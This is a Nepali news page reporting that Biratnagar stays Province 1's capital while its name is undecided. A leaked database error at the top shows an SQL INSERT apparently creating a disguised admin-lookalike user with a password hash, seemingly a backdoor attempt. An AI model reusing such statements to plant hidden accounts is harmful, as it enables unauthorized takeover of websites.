WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYMGT6lNlIZAP2LbVhXSgfPL8IJAca/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-16 05:33:19', '', 'admlnlx', 'admlnlx')

प्रदेश नम्बर १ को राजधानी विराटनगर, नाममा भएन सहमति – Gaule Khabar

प्रदेश नम्बर १ को राजधानी विराटनगर, नाममा भएन सहमति

प्रदेश नम्बर १ को राजधानी विराटनगर, नाममा भएन सहमति

गाउँले न्यूज, २२ बैशाख, मोरङ । प्रदेश १ को स्थायी राजधानी विराटनगर नै कायम हुने भएको छ । दुई तिहाई बहुमत रहेको सत्तारुढ नेपाल कम्युनिस्ट पार्टी (नेकपा)ले स्थायी राजधानी विराटनगर बनाउने प्रस्ताव प्रदेशसभामा दर्ता गरेको छ । आइतबार बसेको सर्वदलीय बैठकमा प्रदेश राजधानी विराटनग राख्ने विषयमा छलफल भएको हो ।

संसदमा काँग्रेसले पनि राजधानी विराटनगरनै राख्ने प्रस्ताव गरेको थियो । प्रदेशको नामाकरणको बारेमा भने सहमति जुट्न सकेको छैन । राजधानीका संरचना भने इटहरिमा समेत रहने भएका छन् । प्रदेशको राजधानी प्रदेशसभाको २ तिहाई बहुमतले अनुमोदन गर्ने व्यवस्था रहेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका